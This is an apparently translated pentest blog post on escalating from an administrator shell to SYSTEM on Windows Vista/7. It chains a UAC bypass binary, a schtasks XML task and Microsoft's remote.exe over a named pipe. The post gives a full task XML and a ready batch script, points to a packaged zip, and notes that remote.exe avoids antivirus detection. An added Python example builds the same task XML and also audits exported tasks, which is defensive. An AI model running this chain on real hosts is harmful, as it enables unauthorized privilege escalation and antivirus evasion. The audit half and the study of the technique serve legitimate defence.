[Win Vista,7] Privilege escalation via SCHTASKS and UAC bypass

ASafety, 2013-09-01 (updated 2016-07-25)
https://www.asafety.fr/en/vuln-exploit-poc/win-vista7-escalade-de-privilege-via-schtasks-et-bypass-uac/

A few days ago ASafety presented the technique for SYSTEM privilege escalation on recent Windows environments with the AT method (https://www.asafety.fr/vuln-exploit-poc/windows-vista7-escalade-de-privilege-via-at-et-bypass-uac/), brought up to date.

As you probably know, the AT scheduled-task command has been considered obsolete on Windows since Vista. Its successor is named "schtasks". This newer command provides many additional features, notably the complete definition of a scheduled task from an XML file.

The idea is still the same: use the native Windows task scheduler to obtain SYSTEM privileges on the machine. These techniques are as useful to system administrators and software integrators as they are to pentesters.

The main obstacles to obtaining a SYSTEM shell through scheduled tasks are:

- a shell under an "administrator" account is required (registering a task that runs as SYSTEM needs an elevated token, so membership in the local Administrators group is the starting point)
- UAC (User Account Control, https://en.wikipedia.org/wiki/User_Account_Control) has to be bypassed, because while UAC is enabled even an administrator's shell runs with a filtered, medium-integrity token and the scheduler refuses to register a SYSTEM task from it
- the shell should be obtained with as little graphical interaction as possible (to make pentesters' work easier)

As detailed in the previous article cited above, bypassing UAC is easily done with a number of tools, notably the one from the "bypassuac" project (https://www.trustedsec.com/downloads/tools-download/). This binary has to be brought onto the target system.

To reduce graphical interaction, the "remote.exe" tool shipped by Microsoft in the Windows Debugger Tools (http://msdn.microsoft.com/en-US/windows/hardware/gg463009/) is amply sufficient, for several reasons:

- it provides both the client and the server side
- it exists as standalone x86 and x64 builds
- it is a legitimate Microsoft binary and is therefore not considered suspicious by antivirus (ideal for pentesters)
- it operates in the current terminal, which allows privilege elevation even from restricted shells

The last point matters because, since Vista, scheduled tasks and services run in the isolated session 0: a cmd.exe started by the scheduler as SYSTEM cannot appear on the user's desktop, so it has to be reached another way. remote.exe does exactly that, by exposing the server-side cmd.exe over a named pipe to which the client, running in the user's session, connects.

"Schtasks" has been the successor of the "at" command since Windows Vista. Both call on the scheduler to execute planned actions under a defined context.
In the case of "schtasks", this context can be declared in an XML file.

Once the target machine is equipped with the "bypassuac.exe" and "remote.exe" binaries, it is enough to create a "schtasks.xml" file with the appropriate parameters:

```xml
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2008-03-26T16:40:47.4520087</Date>
    <Author>CONTOSO\Administrator</Author>
  </RegistrationInfo>
  <Triggers />
  <Principals>
    <Principal id="Author">
      <UserId>SYSTEM</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\remote.exe"</Command>
      <Arguments>/s cmd SYSCMD</Arguments>
      <WorkingDirectory>C:\</WorkingDirectory>
    </Exec>
  </Actions>
</Task>
```

A few points to check before importing this file: the declaration says UTF-16, so the file has to be saved in that encoding (or the declaration changed to match what the editor actually wrote), otherwise the XML parser behind schtasks rejects it; <Triggers /> is empty and <AllowStartOnDemand> is true, so the task only runs when started explicitly; and <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> means no time limit, which keeps the remote.exe server alive until it is closed.

In this file, several lines are to be modified:

- the user the task runs as (SYSTEM):

```xml
<UserId>SYSTEM</UserId>
```

- the command to execute, namely "remote.exe" by its absolute path:

```xml
<Command>"C:\remote.exe"</Command>
```

- the arguments passed to the command, namely starting "remote.exe" as a server (/s) that serves cmd over a pipe named SYSCMD, with SYSTEM privileges:

```xml
<Arguments>/s cmd SYSCMD</Arguments>
```

- finally, an arbitrary working directory:

```xml
<WorkingDirectory>C:\</WorkingDirectory>
```

Once these modifications are made, the following Batch script lists the sequence of operations:

```batch
:: Provided by ASafety.fr
@echo off
set BYPASSUACPATH=C:\bypassuac.exe
set REMOTEPATH=C:\remote.exe
set XMLPATH=C:\schtasks.xml
:: Every schtasks call is wrapped in bypassuac.exe so it runs with a full, high-integrity admin token.
:: Remove any leftover task of the same name (fails harmlessly if none exists), import the XML, then fire it.
%BYPASSUACPATH% /c schtasks /delete /tn RemoteAsSystem /F
%BYPASSUACPATH% /c schtasks /create /tn RemoteAsSystem /xml %XMLPATH%
%BYPASSUACPATH% /c schtasks /run /tn RemoteAsSystem
:: Give the SYSTEM-side remote.exe server time to create its pipe (two pings to localhost, about one second).
ping 127.0.0.1 -n 2 > NUL
:: Connect the client side to the local server over the SYSCMD pipe; the resulting prompt runs as SYSTEM.
%REMOTEPATH% /c %COMPUTERNAME% SYSCMD
```

The principle of operation is as follows:

- the path to the "bypassuac.exe" binary is set in a variable
- the path to the "remote.exe" binary is set in a variable
- the path to the "schtasks.xml" file is set in a variable
- the script deletes any previous scheduled task named "RemoteAsSystem", bypassing UAC
- the script creates a new scheduled task "RemoteAsSystem", loading its properties from the predefined XML file
- the created task is triggered manually, bypassing UAC
- a short pause follows (two pings to localhost, roughly one second) so that the server side has time to start
- finally, "remote.exe" is used in "client" mode to connect locally, via the machine's NetBIOS name, to the server that holds SYSTEM privileges

Executing this script gives the following result:
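As an added example (not code from the ASafety post or its package), the following Python script does programmatically what the XML file and the batch procedure above do by hand, and adds the defensive counterpart: build_task_xml() emits the same minimal task definition (SYSTEM principal, HighestAvailable, empty triggers, Exec action) and audit_task() parses exported task XML, the format `schtasks /query /xml /tn <name>` prints, flagging what this technique leaves behind. The function names, the sample task documents and the list of "trusted" executable prefixes are assumptions made for the example, not Windows rules.

```python
"""Build and audit Task Scheduler 2.0 XML like the schtasks.xml used above.

Added example, not code from the ASafety post or its package. build_task_xml()
emits the skeleton the article edits by hand; audit_task() parses exported task
XML and flags SYSTEM tasks that run a binary from outside the Windows directory.
The sample documents and TRUSTED_PREFIXES are constructed for this example.
"""
import xml.etree.ElementTree as ET

NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"  # schema the article's XML declares
SYSTEM_PRINCIPALS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM", "S-1-5-18"}
TRUSTED_PREFIXES = ("C:\\WINDOWS\\", "%SYSTEMROOT%\\", "%WINDIR%\\")  # assumption for the audit


def q(tag):
    """Qualify a tag with the task schema namespace for ElementTree lookups."""
    return f"{{{NS}}}{tag}"


def build_task_xml(command, arguments="", workdir="C:\\", user_id="SYSTEM",
                   author="CONTOSO\\Administrator"):
    """Return an on-demand task definition that runs `command` as `user_id`.

    Only the elements the article says matter are emitted; the Task Scheduler
    applies defaults for the rest when the file is imported with /create /xml.
    """
    ET.register_namespace("", NS)
    task = ET.Element(q("Task"), version="1.2")
    ET.SubElement(ET.SubElement(task, q("RegistrationInfo")), q("Author")).text = author
    ET.SubElement(task, q("Triggers"))  # empty: the task only runs via schtasks /run
    principal = ET.SubElement(ET.SubElement(task, q("Principals")), q("Principal"), id="Author")
    ET.SubElement(principal, q("UserId")).text = user_id
    ET.SubElement(principal, q("RunLevel")).text = "HighestAvailable"
    settings = ET.SubElement(task, q("Settings"))
    ET.SubElement(settings, q("AllowStartOnDemand")).text = "true"
    ET.SubElement(settings, q("Enabled")).text = "true"
    ET.SubElement(settings, q("ExecutionTimeLimit")).text = "PT0S"  # PT0S = no time limit
    exec_ = ET.SubElement(ET.SubElement(task, q("Actions"), Context="Author"), q("Exec"))
    ET.SubElement(exec_, q("Command")).text = f'"{command}"'  # quoted, as in the article
    if arguments:
        ET.SubElement(exec_, q("Arguments")).text = arguments
    ET.SubElement(exec_, q("WorkingDirectory")).text = workdir
    if hasattr(ET, "indent"):  # Python 3.9+
        ET.indent(task)
    # The declaration promises UTF-16, so the file must be saved that way (see to_file_bytes).
    return '<?xml version="1.0" encoding="UTF-16"?>\n' + ET.tostring(task, encoding="unicode")


def to_file_bytes(xml_text):
    """Encode as UTF-16 with BOM, matching the declaration, so schtasks accepts the file."""
    return xml_text.encode("utf-16")


def audit_task(name, xml_doc):
    """Return (severity, message) findings for one task document (str or bytes)."""
    root = ET.fromstring(xml_doc)
    principal = root.find(f"{q('Principals')}/{q('Principal')}")
    user = principal.findtext(q("UserId"), "").strip() if principal is not None else ""
    run_level = principal.findtext(q("RunLevel"), "LeastPrivilege") if principal is not None else "LeastPrivilege"
    triggers = root.find(q("Triggers"))
    as_system = user.upper() in SYSTEM_PRINCIPALS
    findings = []
    for action in root.iter(q("Exec")):
        command = action.findtext(q("Command"), "").strip().strip('"')
        trusted = command.upper().startswith(TRUSTED_PREFIXES)
        if as_system and not trusted:
            findings.append(("high", f"{name}: runs {command} as {user} from outside the Windows directory"))
        elif run_level == "HighestAvailable" and not trusted:
            findings.append(("medium", f"{name}: runs {command} elevated (RunLevel=HighestAvailable) as {user}"))
    if as_system and triggers is not None and len(triggers) == 0:
        findings.append(("low", f"{name}: SYSTEM task with no triggers (on-demand only, as in manual abuse)"))
    return findings


# Constructed sample exports (not taken from a real system) for the audit.
SAMPLE_BENIGN = f"""<Task version="1.2" xmlns="{NS}">
  <Triggers><CalendarTrigger><StartBoundary>2013-09-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>%SystemRoot%\\system32\\defrag.exe</Command><Arguments>-c</Arguments></Exec></Actions>
</Task>"""

SAMPLE_USER_ELEVATED = f"""<Task version="1.2" xmlns="{NS}">
  <Triggers><LogonTrigger/></Triggers>
  <Principals><Principal id="Author"><UserId>CONTOSO\\jdoe</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe</Command></Exec></Actions>
</Task>"""


if __name__ == "__main__":
    article_task = build_task_xml("C:\\remote.exe", "/s cmd SYSCMD")
    print(article_task)
    for task_name, doc in [("RemoteAsSystem", to_file_bytes(article_task)),
                           ("Defrag", SAMPLE_BENIGN), ("Updater", SAMPLE_USER_ELEVATED)]:
        for severity, message in audit_task(task_name, doc):
            print(f"[{severity}] {message}")
```

On the offensive side, write to_file_bytes(build_task_xml(...)) to a file and pass it to `schtasks /create /tn <name> /xml <file>` exactly as the batch script does; on the defensive side, feed audit_task() the output of `schtasks /query /xml /tn <name>` for each task on a host. The article's own task comes out as one "high" finding (SYSTEM running C:\remote.exe) plus one "low" (no triggers), while a stock maintenance task running from %SystemRoot% produces nothing.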
[Figure: Privilege escalation via schtasks (https://www.asafety.fr/wp-content/uploads/schtasks1.png)]

All the binaries, tools and the script have been gathered in the package Win7_Local-Privilege-Escalation_SCHTASKS_BypassUAC (https://www.asafety.fr/wp-content/uploads/Win7_Local-Privilege-Escalation_SCHTASKS_BypassUAC.zip) to save pentesters time.

This method is not new and should be seen as an evolution of the AT technique using the newer SCHTASKS binary. It was covered in 2008 on Microsoft's TechNet blog (https://blogs.technet.com/b/askds/archive/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008.aspx?Redirected=true). ASafety relays it here with an automated Batch script and a ready-to-use package.

Sources & resources:

- ASafety - Privilege escalation via AT in the Windows XP era: https://www.asafety.fr/vuln-exploit-poc/windows-xp-escalade-locale-de-privilege-via-les-taches-planifiees-at/
- ASafety - Privilege escalation via AT on recent Windows versions: https://www.asafety.fr/vuln-exploit-poc/windows-vista7-escalade-de-privilege-via-at-et-bypass-uac/
- BypassUAC - TrustedSec: https://www.trustedsec.com/downloads/tools-download/
- Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008 - TechNet: https://blogs.technet.com/b/askds/archive/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008.aspx?Redirected=true
- Debugging Tools for Windows: http://msdn.microsoft.com/en-US/windows/hardware/gg463009/